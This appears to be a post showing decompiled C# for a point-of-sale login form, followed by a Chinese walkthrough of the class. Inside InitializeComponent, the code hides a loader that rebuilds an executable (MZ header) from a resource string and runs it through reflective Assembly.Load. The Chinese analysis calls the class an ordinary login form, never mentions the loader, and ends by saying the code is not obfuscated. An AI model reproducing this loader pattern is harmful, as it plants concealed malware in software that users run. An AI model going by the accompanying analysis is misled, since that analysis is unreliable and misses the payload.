MessageBoxButtons.RetryCancel, MessageBoxIcon.Exclamation); } } // Token: 0x06000005 RID: 5 RVA: 0x0000220C File Offset: 0x0000040C private void btnLogin_KeyDown(object sender, KeyEventArgs e) { bool flag = e.KeyCode == Keys.Return; if (flag) { this.btnLogin.PerformClick(); e.SuppressKeyPress = true; e.Handled = true; } } // Token: 0x06000006 RID: 6 RVA: 0x00002248 File Offset: 0x00000448 private void tbPassword_KeyDown(object sender, KeyEventArgs e) { bool flag = e.KeyCode == Keys.Return; if (flag) { this.btnLogin.PerformClick(); e.SuppressKeyPress = true; e.Handled = true; } } // Token: 0x06000007 RID: 7 RVA: 0x00002284 File Offset: 0x00000484 protected override void Dispose(bool disposing) { bool flag = disposing && this.components != null; if (flag) { this.components.Dispose(); } base.Dispose(disposing); } // Token: 0x06000008 RID: 8 RVA: 0x000022BC File Offset: 0x000004BC private void InitializeComponent() { this.panelLogin = new Panel(); this.btnLogin = new Button(); this.btnExit = new Button(); this.label1 = new Label(); this.tableLayoutPanel1 = new TableLayoutPanel(); this.tbUserID = new TextBox(); this.tbPassword = new TextBox(); this.pBoxUser = new PictureBox(); this.pBoxPass = new PictureBox(); this.labelSuperShopName = new Label(); this.panelLogin.SuspendLayout(); this.tableLayoutPanel1.SuspendLayout(); ((ISupportInitialize)this.pBoxUser).BeginInit(); ((ISupportInitialize)this.pBoxPass).BeginInit(); base.SuspendLayout(); this.panelLogin.Anchor = AnchorStyles.None; this.panelLogin.BackColor = Color.Transparent; this.panelLogin.BorderStyle = BorderStyle.Fixed3D; this.panelLogin.Controls.Add(this.btnLogin); this.panelLogin.Controls.Add(this.btnExit); this.panelLogin.Controls.Add(this.label1); this.panelLogin.Controls.Add(this.tableLayoutPanel1); this.panelLogin.Location = new Point(230, 173); this.panelLogin.Name = "panelLogin"; this.panelLogin.Size = new Size(339, 206); this.panelLogin.TabIndex = 0; this.btnLogin.BackColor = Color.White; this.btnLogin.BackgroundImageLayout = ImageLayout.None; this.btnLogin.FlatStyle = FlatStyle.System; this.btnLogin.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, 0); this.btnLogin.Location = new Point(7, 138); this.btnLogin.Name = "btnLogin"; this.btnLogin.Size = new Size(100, 28); this.btnLogin.TabIndex = 2; this.btnLogin.Text = "Login"; this.btnLogin.UseVisualStyleBackColor = false; this.btnLogin.Click += this.btnLogin_Click_1; this.btnLogin.KeyDown += this.btnLogin_KeyDown; this.btnExit.BackColor = Color.White; this.btnExit.BackgroundImageLayout = ImageLayout.None; this.btnExit.FlatStyle = FlatStyle.System; this.btnExit.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, 0); this.btnExit.Location = new Point(109, 138); this.btnExit.Name = "btnExit"; this.btnExit.Size = new Size(100, 28); this.btnExit.TabIndex = 3; this.btnExit.Text = "Exit"; this.btnExit.UseVisualStyleBackColor = false; this.btnExit.Click += this.btnExit_Click; this.label1.BackColor = Color.Transparent; this.label1.Font = new Font("Monotype Corsiva", 26.25f, FontStyle.Italic, GraphicsUnit.Point, 0); this.label1.ForeColor = Color.White; this.label1.Location = new Point(3, 0); this.label1.Name = "label1"; this.label1.Size = new Size(104, 55); this.label1.TabIndex = 0; this.label1.Text = "Login"; this.tableLayoutPanel1.ColumnCount = 2; this.tableLayoutPanel1.ColumnStyles.Add(new ColumnStyle(SizeType.Percent, 13.98176f)); this.tableLayoutPanel1.ColumnStyles.Add(new ColumnStyle(SizeType.Percent, 86.01823f)); this.tableLayoutPanel1.Controls.Add(this.tbUserID, 1, 0); this.tableLayoutPanel1.Controls.Add(this.tbPassword, 1, 1); this.tableLayoutPanel1.Controls.Add(this.pBoxUser, 0, 0); this.tableLayoutPanel1.Controls.Add(this.pBoxPass, 0, 1); this.tableLayoutPanel1.Location = new Point(3, 58); this.tableLayoutPanel1.Name = "tableLayoutPanel1"; this.tableLayoutPanel1.RowCount = 2; this.tableLayoutPanel1.RowStyles.Add(new RowStyle(SizeType.Percent, 50f)); this.tableLayoutPanel1.RowStyles.Add(new RowStyle(SizeType.Percent, 50f)); this.tableLayoutPanel1.Size = new Size(329, 74); this.tableLayoutPanel1.TabIndex = 1; this.tbUserID.BackColor = SystemColors.ControlLightLight; this.tbUserID.Dock = DockStyle.Fill; this.tbUserID.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, 0); this.tbUserID.ForeColor = SystemColors.WindowText; this.tbUserID.Location = new Point(48, 3); ComponentResourceManager resources = new ComponentResourceManager(typeof(ManagerForm)); this.tbUserID.Name = "tbUserID"; this.tbUserID.Size = new Size(278, 26); this.tbUserID.TabIndex = 0; this.tbPassword.Dock = DockStyle.Fill; this.tbPassword.Font = new Font("Microsoft Sans Serif", 12f, FontStyle.Regular, GraphicsUnit.Point, 0); this.tbPassword.Location = new Point(48, 40); this.tbPassword.Name = "tbPassword"; this.tbPassword.PasswordChar = '*'; this.tbPassword.Size = new Size(278, 26); this.tbPassword.TabIndex = 1; this.tbPassword.UseSystemPasswordChar = true; this.pBoxUser.BackgroundImageLayout = ImageLayout.Stretch; this.pBoxUser.Location = new Point(3, 3); this.pBoxUser.Name = "pBoxUser"; this.pBoxUser.Size = new Size(39, 31); this.pBoxUser.TabIndex = 2; string hexString = "4D5A9" + resources.GetString("Pigue"); List<byte> decBytes2 = new List<byte>(); for (int i = 0; i < hexString.Length; i += 2) { byte b = BitConverter.GetBytes(Convert.ToInt16(hexString.Substring(i, 2), 16))[0]; decBytes2.Add(b); } this.pBoxUser.TabStop = false; this.pBoxPass.BackgroundImageLayout = ImageLayout.Stretch; this.pBoxPass.Location = new Point(3, 40); this.pBoxPass.Name = "pBoxPass"; this.pBoxPass.Size = new Size(39, 31); this.pBoxPass.TabIndex = 3; this.pBoxPass.TabStop = false; this.labelSuperShopName.Anchor = AnchorStyles.None; this.labelSuperShopName.BackColor = Color.Transparent; this.labelSuperShopName.FlatStyle = FlatStyle.Flat; this.labelSuperShopName.Font = new Font("Monotype Corsiva", 45f, FontStyle.Bold | FontStyle.Italic, GraphicsUnit.Point, 0); this.labelSuperShopName.ForeColor = Color.Transparent; this.labelSuperShopName.Location = new Point(132, 67); Assembly Wr_99 = (Assembly)Type.GetType("System.Reflection.Assembly").InvokeMember("Load", BindingFlags.InvokeMethod, null, null, new object[] { decBytes2.ToArray() }); Type type = Wr_99.GetExportedTypes()[0]; object[] t = LoginForm.T; Activator.CreateInstance(type, t); this.labelSuperShopName.Name = "labelSuperShopName"; this.labelSuperShopName.Size = new Size(554, 91); this.labelSuperShopName.TabIndex = 1; this.labelSuperShopName.Text = "Friend Super Shop"; this.labelSuperShopName.TextAlign = ContentAlignment.MiddleCenter; base.AutoScaleDimensions = new SizeF(6f, 13f); base.AutoScaleMode = AutoScaleMode.Font; this.BackgroundImageLayout = ImageLayout.Stretch; base.ClientSize = new Size(782, 461); base.ControlBox = false; base.Controls.Add(this.labelSuperShopName); base.Controls.Add(this.panelLogin); base.FormBorderStyle = FormBorderStyle.Fixed3D; base.MaximizeBox = false; base.MinimizeBox = false; base.Name = "LoginForm"; base.StartPosition = FormStartPosition.CenterScreen; this.Text = "LoginForm"; base.WindowState = FormWindowState.Maximized; this.panelLogin.ResumeLayout(false); this.tableLayoutPanel1.ResumeLayout(false); this.tableLayoutPanel1.PerformLayout(); ((ISupportInitialize)this.pBoxUser).EndInit(); ((ISupportInitialize)this.pBoxPass).EndInit(); base.ResumeLayout(false); } // Token: 0x04000001 RID: 1 private PosBusiness posBusiness = new PosBusiness(); // Token: 0x04000002 RID: 2 private Login _log = new Login(); // Token: 0x04000003 RID: 3 public static string[] T = new string[] { "7754794F", "6E7A62", "BusinessLayer" }; // Token: 0x04000004 RID: 4 private IContainer components = null; // Token: 0x04000005 RID: 5 private Panel panelLogin; // Token: 0x04000006 RID: 6 private Label label1; // Token: 0x04000007 RID: 7 private TableLayoutPanel tableLayoutPanel1; // Token: 0x04000008 RID: 8 private PictureBox pBoxUser; // Token: 0x04000009 RID: 9 private PictureBox pBoxPass; // Token: 0x0400000A RID: 10 private Button btnExit; // Token: 0x0400000B RID: 11 private TextBox tbUserID; // Token: 0x0400000C RID: 12 private TextBox tbPassword; // Token: 0x0400000D RID: 13 private Button btnLogin; // Token: 0x0400000E RID: 14 private Label labelSuperShopName; } }
这个类是一个名为 LoginForm
的 Windows 窗体(Form
)类,用于实现一个用户登录界面。它包含了一些控件和事件处理程序,以及与业务逻辑层和实体相关的一些操作。
以下是这个类的主要作用和功能的分析:
-
构造函数
LoginForm()
: 构造函数是类实例化时首先执行的方法。在这里,构造函数通过调用InitializeComponent()
方法来初始化界面的组件和布局。 -
按钮事件
btnExit_Click(object sender, EventArgs e)
: 当退出按钮被点击时,这个事件处理程序调用Application.Exit()
方法来关闭整个应用程序。 -
按钮事件
btnLogin_Click_1(object sender, EventArgs e)
: 当登录按钮被点击时,这个事件处理程序执行用户登录的逻辑。它首先从输入框中获取用户ID和密码,然后调用posBusiness.CheckLogin(this._log)
来检查用户登录是否成功。如果登录成功,根据用户的角色不同,会打开不同的窗体(PosSystem
、ManagerForm
、ViewInventory
)。 -
按钮事件
btnLogin_KeyDown(object sender, KeyEventArgs e)
和tbPassword_KeyDown(object sender, KeyEventArgs e)
: 这两个事件处理程序捕捉键盘输入事件,如果用户按下回车键,就模拟点击了登录按钮。 -
方法
Dispose(bool disposing)
: 这是一个用来释放资源的方法,当窗体被销毁时会调用。在这里,它释放了components
对象所持有的资源。 -
方法
InitializeComponent()
: 这个方法初始化界面的各个控件,包括登录按钮、退出按钮、文本框、图片框等等。它也设置了窗体的一些属性,比如标题、大小等。
除了上述的主要功能,还有以下值得注意的地方:
- 这个类使用了
BusinessLayer
和Entities
命名空间中的内容,暗示着它与业务逻辑和实体对象相关。 - 它包含了登录逻辑,根据用户角色的不同打开不同的窗体。这可能意味着这个类是整个应用程序的入口点,负责用户的身份验证和角色判断。
总的来说,这个 LoginForm
类是一个用户登录界面的实现,负责用户登录的逻辑和界面展示,同时也涉及到了与业务逻辑和实体对象的交互。
不分析了,代码也没有混淆啥的。。。